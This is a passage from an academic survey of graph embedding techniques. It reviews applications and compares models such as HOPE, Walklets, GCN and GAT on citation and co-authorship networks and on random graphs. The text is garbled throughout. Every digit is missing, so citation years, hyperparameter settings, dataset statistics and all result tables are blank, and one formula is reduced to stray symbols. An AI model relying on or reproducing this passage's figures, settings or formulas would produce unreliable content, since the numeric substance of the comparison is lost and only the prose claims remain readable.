tasks, but their model accounts for inter-sentence dependencies. question answering, comment generation and dialog systems are highly dependent on domain knowledge-base. such knowledge-base usually can be depicted as knowledge graphs. banerjee & khapra ( ), kim, kim & kwak ( ) applies gnn to encode knowledge and account to it in these tasks. li et al. ( b) also use graph models based on news interaction graphs. the transformer-based language models (vaswani et al., ) works in a similar way to graph attention networks. it models a sentence as a complete graph and calculates new word representation weighting previous vectors with self-attention. the bert model (devlin et al., ) is a special case of transformer-based models. it learns the vector by predicting masked words. such tasks can be formulated as link prediction between context and masked words. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ knowledge graph completion knowledge graph embedding aims to learn vectors for entities and multi-dimensional vectors for entity relations. knowledge graph completion solves link prediction between entities in knowledge graphs thus predicting ordered triples of entity-relation-entity (lin et al., ). knowledge graph (kg) embedding presents a knowledge base as a collection of triples “head-relation-tail” and consider them training samples. structured embedding (bordes et al., ) learns two separate entity-relation representations for head and tail, while semantic matching energy (bordes et al., ), latent factor model (jenatton et al., ) and neural tensor network (socher et al., ) embed entities and relations, and use models to capture correlations between them. a survey on kg embeddings wang et al. ( a) considers translation-based models, such as transe (bordes et al., ), transh (wang et al., ), transm (fan et al., ), transr/ctransr (lin et al., ), transc (lv et al., ), transd (ji et al., ), transparse (ji et al., ), kg e (he et al., ), and semantic matching models, based on rescal (nickel, tresp & kriegel, ) tensor factorization framework, such as distmult (yang et al., ), hole (nickel, rosasco & poggio, ) and complex (trouillon et al., ) with comparison paper for the latter two in trouillon & nickel ( ). question answering via knowledge graph embeddings was suggested in huang et al. ( ). weighted attention for supporting triple in kg link prediction problem was presented in mai, janowicz & yan ( ). data mining ye et al. ( ) proposed method that models relations between different entities in android logs (api, apps, device, signature, affiliation) using a hierarchical graph. then they classify nodes of such graphs for real-time malware classification. graph neural networks are widely used to utilize the social network information. wu et al. ( a), song et al. ( ), chen et al. ( a) use such models to account for social effects in recommender systems. zhang, ren & urtasun ( ) propose graph hypernetworks for neural architecture search. it learns topology of architecture and infers weights for it. recommender systems the basic approach for recommending top k nodes of interest for a given node is usually based on certain similarity metric (pirotte et al., ; zhao et al., ; gui et al., ; zhou et al., ; ou et al., ). there are various situations in which one need to provide node recommender system zhang & wang ( ), in particular, for items to customers via app model (zhou et al., ), documents matching a given query (xiong, power & callan, ), community-based question answering (zhao et al., ; fang et al., ), music recommendations via user preference embedding for query answering (chen et al., a, a), location recommendations (xie et al., ), and many other real-world scenarios. matrix completion approach based on graph embeddings was provided in monti, bronstein & bresson ( ). large scale recommender system was presented in ying et al. ( a). explainable recommendations were studied in zhang & chen ( ). makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in zhang, wang & zhang ( d) authors represents product search as a graph of co-clicked answers. they mix network embedding, term item vectors and term query vector using mlp to predict the probability of click on the item in certain query. this score is used to rank products. star-gcn (zhang et al., c) is used over user-item interaction graph to learn user and item vectors. this approach is also suitable for inductive learning only using several interactions of users and items. this helps to solve the cold-start problem in recommender systems. shang et al. ( ) use graphs for encoding hierarchical structure of health diseases. next, achieved embeddings are integrated into bert model for visit-based user recommendation. the classical specific case of using network science in recommendations is the link prediction in collaborator networks (chen, li & huang, ; liu & kou, ; li & chen, ; cho & yu, ). kong et al. ( ) developed a scientific paper recommender system based on citation networks, which uses text information embeddings to find papers of similar research interest and structural network embedding. the combined embedding model was then applied for constructing article vector representations. a combination of network and knowledge graphs was proposed in yang, tang & cohen ( b). in makarov et al. ( a, b, c) authors show that two-level architecture can improve the recommendation results. firstly it predicts the collaboration itself and further estimates its quantity/quality. a survey on co-authorship and citation recommender systems may be found in ortega et al. ( b). biomedical data science the large variety of data in biomedicine can be represented as networks. le, yapp & yeh ( ) applies embedding techniques to electron transport chains. do, le & le ( ) utilizes it for detection of specific proteins. lin et al. ( b) exploits the dynamic graph embedding for detecting changes in functional connectivity in the brain network. computational drug design is an attractive direction because it reduces the costs of development of new drugs. the prominent field is drug repositioning. it usually works with networks of drug interaction with other entities: target, disease, gene or another drug. the main idea of such task is to predict possible relations between drug and other entities su et al. ( ). for example, drug-disease interaction networks can predict the possible treatment of new disease with existing drugs. so, it is a similar statement to the link prediction problem. yamanishi et al. ( ), cobanoglu et al. ( ), ezzat et al. ( ) find drug-target pairs via proximity over matrix factorization based embeddings. zheng et al. ( ), yamanishi et al. ( ), ezzat et al. ( ) try to add external data to the drug-interaction network embeddings. luo et al. ( ), zong et al. ( ), alshahrani et al. ( ) build heterogeneous networks of different drug-related interaction and apply network embedding methods to it. wang et al. ( a) embeds heterogeneous gene graph to predict drug response. another important field in medicine design is the adverse drug reaction (adr) analysis. some articles (zitnik & zupan, ; zitnik, agrawal & leskovec, ) focus on similar drug–drug and drug–target interaction prediction. wang ( ), abdelaziz et al. ( ) makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ use the knowledge graph based on biomedical texts. stanovsky, gruhl & mendes ( ) also works with kg embedding, but over adrs mentions in social media. network science is also applied to the molecule structure. li et al. ( b) proposes a prediction of pathogenic human genes using network embedding. network embedding is very popular method in protein–protein interaction assessment and function prediction (kulmanov, khan & hoehndorf, ; su et al., ; wang, qu & peng, b). shen et al. ( ) and li et al. ( a) applies to mirna-disease interaction network to associate genes with complex diseases. the detailed survey of biomedical network embedding applications is presented by su et al. ( ). reinforcement learning reinforcement learning (rl) is a popular approach to solve combinatorial optimization problems. zheng, wang & song ( ) provides the open-sourced environment for graph optimization problems using reinforcement learning and graph embeddings. hayashi & ohsaki ( ) use rl for a similar task, such as binary topology optimization of trusses. it utilizes graph convolution networks for feature extraction and further usage in rl optimization. a similar concept was used in yan et al. ( ) to solve automatic embedding problem using actor-critic models for optimization and graph embeddings for representation learning. waradpande, kudenko & khosla ( ) suggests encoding states in markov’s decision process with graph embedding models. lin, ghaddar & nathwani ( a) follows this idea and utilizes gnn for parametrization of the stochastic policy in electric vehicle routing problem. zhou et al. ( ) solves the interactive recommender system problem enhancing it with knowledge graphs. it describes states using gcn over knowledge graph. open problems here we mention the most interesting open problems in graph representation theory, which are far from good results applicable for any given scenarios. many real-world graphs are dynamic: nodes and edges can appear and vanish over time. despite a large number of recent papers, this field is far from benchmark well-performing models as of now. one of the approaches for it is inductive learning, which is strongly correlated with graph dynamics problem. inductive methods allow finding embedding for newly added nodes without refitting the whole model. it is important in real-world applications and partially solve the scalability issue. edge attributes aware network embedding is poorly studied field. there is a low number of models. such models usually depend on a line graph, which has a dramatically larger number of nodes. so such models have a problem with scalability. edge attributes are important in such tasks as context-aware recommender systems or transportation networks optimization. they are an only little number of works about subgraph embedding. such models should represent complex structures like triangles or hierarchy. the application of non-euclidean spaces to the embedding task is a promising method solving this issue, but also poorly studied. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recent advances in the distributed and batch training for graph neural networks looks promising. however, most of the methods are not theoretically grounded, so it could be hard to understand the issues of poor quality of results. only zeng et al. ( ) provides some bias-variance analysis of node and edge sampling approaches. however, akyildiz, aljundi & kaya ( ) provides a much faster and powerful method for large scale embedding. another field that is currently under the control of many papers is the heterogeneous graph embedding. such graphs are very common in real-world scenarios. the graph attention-based methods look promising in that field. it allows us to catch different aggregation levels like in fu et al. ( ) and li et al. ( b). as can be seen from our survey, most embedding models catch specific graph attributes and there is no general model, thus, raising a problem of selection and recommendation of different models for specific use-cases. it is also an interesting point to develop meta-strategies for embedding mixture, that will preserve different graph properties. such meta-models could solve the problem of knowledge generalization and reduce costs for deploy of application. as in the other fields like nlp and cv, graph neural networks are poorly interpretable, apart from an initial study in ying et al. ( ). these and many other research questions lead to a vast amount of open research directions, which will benefit the field and lead to many applications in other computer science domains. in our study, we focus on another interesting question regarding the fact that there are almost no general studies that compare the performance of models based on graph properties, most of the models are created for specific graph use-case. below, we provide our insights on real-world networks as well as interpretations on such findings. model comparison this paper focuses on the four most popular tasks on graphs: node classification, link prediction, node clustering and network visualization. these tasks cover most of the real-world applications, in which a graph is used to unify information on nodes and their properties. data we use four benchmark datasets for comparison of different models: cora (sen et al., ), citeseer (lim & buntine, ), hse coauthor network (makarov et al., ), and microsof academic graph computer science (mag cs) (sinha et al., ). first two datasets are citation networks. this type of networks is very common for evaluating the quality of network embeddings. also, these datasets are convenient for comparison of models, because they have interesting label and feature structure. the last dataset is a co-authorship network. it has heterogeneous edges and large size. general puspose graph embedding models work only with homogeneous graphs, so we merge all the edges between nodes in one edge. a brief overview of the datasets statistics is provided in table . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ metrics we use standard classification metrics for node classification and link prediction tasks. � accuracy is the rate of the right answer of a classifier. � precision is the rate of true positive answers relative to the number of all positive answers of a classifier. � recall is the rate of true positive answers relative to the number of all positive examples in the data. � f is a harmonic mean of precision and recall. � area under roc-curve shows the probability that a random negative example sampled from a uniform distribution is ranked lower than randomly sampled positive. � average precision is the average of all possible precision values weighted by the recall for different probability thresholds. we calculate the standard deviation with the following procedure: . generate subsample of data with % volume of a given dataset. . train model on it . estimate quality of the trained model on the test set. . repeat previous steps nine more times. described bootstrap (efron ( )) procedure allows to easily calculate standard error and confidence intervals for any statistics. confidence intervals are required to understand the significance of the difference between models. node clustering was evaluated with two metrics: silhouette coefficient and modularity. � silhouette score shows the average similarity between each example and its cluster in comparison with the closest another cluster, so it measures the overall cluster separation relative to the distance measure. in our study, we use the euclidean distance. � modularity score works pretty similarly but for computing inter- and intra-cluster quality, it measures the density of connections between clusters, respectively to its density inside clusters. we also evaluate the quality of node clustering and network visualization with a visual comparison of how clusters are grouped in the umap (mcinnes, healy & melville, ) projection of embeddings. umap (uniform manifold approximation and projection) table datasets description. assortativity label modularity #nodes #edges #features #classes cora . . , , citeseer . . , , hse – – , mag cs . . , , makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is the dimensionality reduction technique based on topology and riemannian geometry. firstly, it builds the weighted nearest neighbors graph according to elements feature vectors (embeddings). then, it initializes layout using spectral embedding and optimizes it using sgd minimizing fuzzy-set cross-entropy. the umap works much faster then tsne and gives at least the same quality of the projection. interpretation of received plot is simple: similar samples in initial space (for e.g., nodes with the same labels) should lie closely in the d plane. evaluation pipeline the node classification task is native multi-class classification. link prediction task can be also solved as classification, but with two classes depicting edge existence. the basic approach on validating such methods is to use delayed sample. so, before any model was trained, we create a train-test split for all the datasets, in order to compare all the models on similar subsets. we use simple % test, % train random split for node classification, following other papers on graph embeddings. the problem with link prediction is that described graphs are high-imbalanced because there are much more unconnected node pairs. large imbalance leads to poor training because even simple constant prediction will give high-scores. one of the methods for working with this problem is to the under-sample larger class. to keep the classification task harder, it is convenient to use a negative sampling technique. we select the most similar pairs of nodes which are not connected in the same amount as existent edges. the used proximity metric is cosine similarity, which is a normalized dot product of feature vectors. for features, we use the adjacency matrix. because basic classification models do not work with discrete graph data, after developing train and test samples, we need to generate meaningful features. here we use the unsupervised graph embeddings ( dimensions as commonly used in different papers and surveys). graph neural networks were also trained in an unsupervised way with reconstruction loss over the graph adjacency matrix. reconstruction loss calculates with binary cross-entropy between adjacency matrix and its estimation achieved by inner-product decoding from the embedding matrix. now, we can solve downstream tasks like classification or clustering. for that part, we use three different classifiers: logistic regression (lr), random forest (rf) and gradient boosting (gbm). logistic regression is a linear model: it calculates the weighted average of object features and normalizes it with sigmoid to receive probability. linear models are fast, interpretable and easily tunable because of their simplicity. random forest is the ensemble of decision trees built on bootstrapped subsamples in both dimensions features and observations. gradient boosted machines are another approach to learn decision tree ensemble. it determines each next tree by sequential optimization of the previous learner error-term. the main advantage of the tree-based models is that they could recover non-linear dependencies. but for this flexibility, we pay with a strong dependance on hyperparameter selection. scikit-learn implementation with default hyperparameters was used. in the link prediction, we simply concatenate node vectors to achieve edge embedding. for the clustering, we use the k-means model from scikit-learn. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ remark. the common way to use graph neural networks is semi-supervised training. such an approach gives a bias towards the usage of that model, because embedding learns not only graph structure and feature transformations, but supervised information about labels on the other hand. so we train graph neural networks in an unsupervised way because our study is aimed to understand how different properties of embedding models can help in considered tasks. models we select several models of different types mentioned in “methods for constructing graph embedding” that preserve different properties of a graph. the general idea is to compare models of different fitting approaches with respect to network properties. matrix factorization based models: � grarep is symmetric and preserves high-proximity. the default k-hop order is , the number of svd iterations is , a random seed is . � hope directly models asymmetric similarities. � m-nmf preserves community structure. the default number of clusters is , clustering penalty is . , modularity regularization penalty is . , similarity mixing parameter is , the number of power-iterations is , early stopping step is . random-walks based models: � node vec is a baseline for sequential methods which efficiently trade-offs between different proximity levels. the default walk length is , the number of walks per node is , return hyper-parameter is , in-out hyper-parameter is . � diff vec use diffusion to sample random walks. the default number of nodes per diffusion tree is , the number of diffusions per source node is , context-size is , the number of asgd iterations is , the learning rate is . . � walklets allow to model different levels of community structure and generalize grarep model. default random walk length is , the number of random walks per source node is , the window size is , the minimal number of appearances is , the order of random walk is first, return hyper-parameter is , in-out hyper-parameter is . � gemsec directly cluster nodes. default random walk length is , the number of random walks per source node is , the window size is , the minimal number of appearances is , the order of random walk is first, return hyper-parameter is , in-out hyper-parameter is , distortion is . , negative samples number is , the initial learning rate is . , annealing factor for learning rate is , initial clustering weight coefficient is . , final clustering weight coefficient is . , smoothness regularization penalty is . , the number of clusters is , normalized overlap weight regularization. deep learning models: � gcn is a baseline for deep learning models. the default number of epochs is , dropout is . , the learning rate is . , weight decay is . , the number of hidden layers is . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � graphsage (gs) improves gcn by reducing the number of neighbors while weighting the node vectors. the dropout is . , aggregation is gcn, the number of epochs is , the learning rate is . , weight decay is . . � gat utilizes an attention mechanism. the number of epochs is , in-dropout is . , attention dropout is . , the learning rate is . , the negative slope is . , weight decay is . , the number of hidden layers is . results the current section has the following structure. we start the analysis from node clustering tasks because it also helps to understand the performance of graph embeddings on the other tasks. further, we describe node classification task and link prediction followed by network visualization. we also conducted experiments on random graphs to study the difference of graph embeddings on real-world networks and simulated ones. node clustering the results on the node clustering task are presented in table . rows depict different models, which are grouped by model type: matrix factorization, random walks, graph neural networks with and without features. on the columns, we can see results on different datasets. for each dataset, we calculate two metrics: modularity and silhouette score. highlighted results are the best. in node clustering task, results are pretty obvious: the embeddings, which work with community structure, perform the best in terms of modularity. gemsec directly penalizes embeddings for low modularity score with k-means objective, walklets catches this information by accounting for several levels of node neighborhood. importance of such information could be proven by the comparatively high value of grarep model, that works pretty similar to walklets. graph neural networks with features give comparatively better results, meaning that node content helps to describe graph structure. graphsage and gat efficiently utilize the local structure of the network. the main difference is that gat aggregates over the entire neighborhood, but graphsage aggregates only over a fix-sized sample. in the case of mag cs graph (table ) the best results show gat and gcn. it means that in the case of large, heterogeneous graph features play a major role. interesting, that gat without features works much better than other structural models. it could refer to the attention, that selects only the most important neighbors in node embedding construction. it seems that the attention mechanism helps in this case to distinguish heterogeneous edge nature. gnn models trained in unsupervised fashion give poor results because they highly rely on the features when constructing embeddings even for learning graph structure. the clustering results show that specific losses can dramatically increase quality on a specific task. as we will see further, such losses are also helpful in the node classification task preserving important graph properties. makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ node classification the results on node classification task are presented in table . rows show different types of models and columns show different datasets. for each dataset, we calculate accuracy for three different models: gradient boosted machines, logistic regression and random forest. highlighted results are the best. models that have good performance in node clustering task also show high score in node classification. labels in given datasets show different topics of articles, as soon as usually authors are dedicated to specific topics, so natural communities are constructed within these labels. this can also be proven by high modularity and assortativity coefficients of label communities for all graphs. in the classification task, it is also important to have a good separation of clusters, that could be measured by the silhouette coefficient. we can see those models that keep both high modularity and high silhouette work better. linear models show the comparatively lower score, but for random walk based embeddings, this difference is much less severe. most of considered random walk models are based on skip-gram approach, which is a log-linear model. it reduces expression quality of the model but allows to learn vectors that perform well in linear models. results for mag cs are presented in table . firstly, we compare fewer models, because we were not able to compute some embeddings for such a large graph, so we choose the table results of model validation on node clustering task (both metrics lie between (− , ) and higher value means better results). bold corresponds to the best metric for each dataset. cora citeseer hse modularity silhouette modularity silhouette modularity silhouette grarep (cao, lu & xu, ) . . . . . . hope (ou et al., ) . . . . . . node vec (grover & leskovec, ) . . − . . . . diff vec (rozemberczki & sarkar, ) . . . . . . gemsec (rozemberczki et al., ) . . . . . . walklets (perozzi, kulkarni & skiena, ) . . . . . . gcn kipf & welling ( a) . . . . – – graphsage ( hamilton, ying & leskovec, a) . . . . – – gat (veličković et al., ) . . . . – – gcn (nf) − . . . . . . graphsage (nf) . . . . . . gat (nf) . . . . . . table results of model validation on node clustering task for mag-cs dataset (both metrics lie between (− , ) and higher value means better results). hope node vec grarep walklets gcn gat gcn (nf) gat (nf) modularity − . − . . . . . . . silhouette . . . . . − . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fastest ones with good performance in other experiments. hope outperforms other classic non-attributed embeddings. it is also interesting that the linear mixture of embedding elements works much better for this embedding then others. one of the reasons for such behavior is that in the large graphs, embeddings could be noisy and simple models could give better quality. it could be also a reason for the worse performance of k-hop based embeddings (walklets and grarep). but the main driver in node classification quality is the features of nodes. it could be seen from the high results of gcn and gat models. hope has a dramatic difference between linear and non-linear models because it estimates katz centrality, which has non-linear nature. also, we use hope implementation from gem goyal & ferrara ( ), where node embedding is achieved as a concatenation of its self- and context-representations. the non-linear model helps to reconstruct the dot table results of model validation on node classification task (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf cora grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . citeseer grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ product decoder. a similar argument can explain diversity in neural network models, but it has less variance because of high clustering efficiency. link prediction table shows results for link prediction task. it is separated into three groups by datasets. rows represent different graph embedding models and columns show different second- level classification models: gradient boosted machines, logistic regression and random forest. highlighted results are the best. in the link prediction task, we can also see the importance of clustering. links are more likely to occur within one community. the high-proximity models also work much better, because in that task we need to understand how similar are non-connected nodes. the performance of the hope model in this task is more significant. hope model concentrates on preserving asymmetric transitivity. the older paper can not cite the newer one. gcn without features performs much better than other graph neural networks. it accounts for the whole neighborhood and directly uses the adjacency matrix to train embeddings. results for mag cs (table ) are consistent with these findings. however, despite the good quality on the community clustering task, gat without features shows pure performance on the link prediction task. however, gcn without features is close to the gat with features. it means that in this task it is necessary to account the whole neighborhood. a dramatic difference in the quality of linear and non-linear models can be explained by the objective of the link prediction task. it requires to model the proximity between to nodes. such metrics are non-linear. so for reconstructing it from concatenated vectors of nodes, we need some non-linear transformations. graph visualization we present results of node clustering jointly with network visualization using umap technique. the results for three different datasets are shown at fig. for cora, fig. for citeseer, and fig. for hse datasets, respectively. table results of model validation on node classification task for mag-cs dataset (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table results of model validation on link prediction task (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf cora grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling ( a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . citeseer grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al., d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . graphsage (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . graphsage (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . hse grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . m-nmf (wang et al. ( d) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . diff vec (rozemberczki & sarkar, ) . ± . . ± . . ± . gemsec (rozemberczki et al., ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (nf) (kipf & welling, a) . ± . . ± . . ± . graphsage (nf) (hamilton, ying & leskovec, a) . ± . . ± . . ± . gat (nf) (veličković et al., ) . ± . . ± . . ± . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the best visualization in terms of community structure seems to be walklets and grarep models, which give nicely distinguishable clusters in all the cases. both models work in the same way with k-hop similarity of vertices. gemsec also provides separate cluster picture but creates a lot of noisy points. interestingly, that hope also split graphs into several parts, but we can see by the modularity score, such parts are not correlated with node communities. such an effect could occur because hope embedding has non-homogeneous structure due to concatenation of self- and context-representations. in the case of graph neural networks, except for gat, all clusters have poor separation. such effect occurs because gnn weights neighborhood node attributes, so boundary nodes will be close. gat allows mitigating this problem because utilizes the attention mechanism, which weights meaningless node neighbors to zero. table results of model validation on link prediction task for mag-cs dataset (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. gbm lr rf grarep (cao, lu & xu, ) . ± . . ± . . ± . hope (ou et al., ) . ± . . ± . . ± . node vec (grover & leskovec, ) . ± . . ± . . ± . walklets (perozzi, kulkarni & skiena, ) . ± . . ± . . ± . gcn (kipf & welling, a) . ± . . ± . . ± . gat (veličković et al., ) . ± . . ± . . ± . gcn (nf) . ± . . ± . . ± . gat (nf) . ± . . ± . . ± . figure umap projection of cora embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it seems that one of the most important graph property in the studied tasks is the community structure. so, most of the methods, that works with it directly allow to achieve the best scores. it is also connected to the level of proximity because it is indirectly connected with the community structure. the graph neural networks allow to easily catch node attributes, but miss most of graph properties information, so it performs on the level of baseline models without it. random graphs in order to understand robustness of graph embeddings, we decided to test how modeling real-world network with random graphs impact on the quality of graph embeddings for simulated networks. firstly, we should explain the formation of random graphs in different models. erdös & rényi ( ) builds the graphs using a simple binomial rule for creating an edge with a given density of graph. barabási & albert ( ) starts from a small graph and sequentially adds a new node with a given density and connects existing nodes using preferential attachment rule. in the watts & strogatz ( ) model, the regular lattice is firstly constructed followed by edge rewiring procedure. we build random graphs regarding the properties of real-world graphs. to build er graph one need to have a number of nodes and edges in the graph. for the ba graph construction, it is required to have a number of nodes and number of edges for the newly added node at each iteration. it is a small integer, so we just select the best to fit the number of edges of benchmarks. the parameters of ws graphs were chosen based on the number of nodes, edges and average clustering of graphs following formulae: the number of edges in starting lattice is equal to k = [ # edges# nodes], the rewriting probability is equal to p ¼ � ffiffi ½ p � ðk � Þ= ðk � Þ � ðaverage clusteringÞ (barrat & weigt, ). figure umap projection of citeseer embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one of the main properties of all random graph models is the giant connected component. so embedding models learn it on the train part and works better than random in link prediction task in all cases. additionally, in the ba model, there are some nodes with much larger density than others, so it is easier to predict missed links. watts–strogatz also has a straightforward mechanism of edge construction, where the shortest path is small. in both ba and ws models it is also possible to reproduce community structure. we can see it by large modularity metric in the clustering task. random graph modeling is one of the efficient methods in network science for evaluation of different model properties. for example, comparison of real-graph with its random analog could help to understand how good is the received quality for the specific task. we follow this idea and compare two embeddings models walklets and hope. figure umap projection of hse embeddings: (a) hope. (b) node vec. (c) diff vec. (d) grarep. (e) walklets. (f) gemsec. (g) m-nmf. (h) gcn. (i) graphsage. (j) gat. full-size doi: . /peerj-cs. /fig- table results of model validation on node clustering task for random graphs (both metrics lie between (− , ) and higher value means better results. bold corresponds to the best metric for each dataset. hope walklets modularity silhouette modularity silhouette cora (original) . . . . cora (barabási-albert) . . . . cora (erdős-rényi) − . . . . cora (watts-strogatz) . . . . citeseer (original) . . . . citeseer (barabási-albert) − . . . − . citeseer (erdős-rényi) . . − . . citeseer (watts-strogatz) . . . . makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table results of model validation on link prediction task for random graphs (accuracy metric lies between ( , ) and higher value means better results). bold corresponds to the best metric for each dataset. rf lr gbm walklets cora original . ± . . ± . . ± . cora-er . ± . . ± . . ± . cora-ba . ± . . ± . . ± . cora-ws . ± . . ± . . ± . citeseer original . ± . . ± . . ± . citeseer-er . ± . . ± . . ± . citeseer-ba . ± . . ± . . ± . citeseer-ws . ± . . ± . . ± . hope cora original . ± . . ± . . ± . cora-er . ± . . ± . . ± . cora-ba . ± . . ± . . ± . cora-ws . ± . . ± . . ± . citeseer original . ± . . ± . . ± . citeseer-er . ± . . ± . . ± . citeseer-ba . ± . . ± . . ± . citeseer-ws . ± . . ± . . ± . figure umap projection of citeseer based random graph embeddings: (a) original graph, hope. (b) erdős-rényi, hope. (c) barabási- albert, hope. (d) watts-strogatz, hope. (e) original graph, walklets. (f) erdős-rényi, walklets. (g) barabási-albert, walklets. (h) watts- strogatz, walklets. full-size doi: . /peerj-cs. /fig- makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we select these embeddings because it is non-context, show good performance and saves different properties. walklets preserves k-hop similarity and hope preserves asymmetric transitivity. similarly to the experiments on the real-world graphs, walklets shows superior performance in comparison to the hope in clustering (table ) and lpp (table ) tasks. however, visually (figs. and ) it better separates dense clusters. the walklets visualization of random graphs differs from real-world cases. random graphs give much sparser and visually harder to distinguish structure. the results on random graphs and real networks differ sufficiently. it means that embedding models could really learn graph structure and its properties. also, such citation networks are poorly described by random graph models. conclusion in the current work, we present a comprehensive survey of graph embedding techniques. the work overviews different types of graph embeddings with respect to methods, network types, their applications to computer science domains. one of the main achievements at the moment are the scalable models. the gnn could be trained in batch and distributed fashion. such methods allow using powerful attribute- aware models for real-world large graphs. however, only a few works analyze the proper strategies for batch sampling and its effect on the final results in terms of bias-variance trade-off. another way to accelerate gnn training is to coarse a graph, but it could affect figure umap projection of cora based random graph embeddings: (a) original graph, hope. (b) erdős-rényi, hope. (c) barabási- albert, hope. (d) watts-strogatz, hope. (e) original graph, walklets. (f) erdős-rényi, walklets. (g) barabási-albert, walklets. (h) watts-strogatz, walklets. 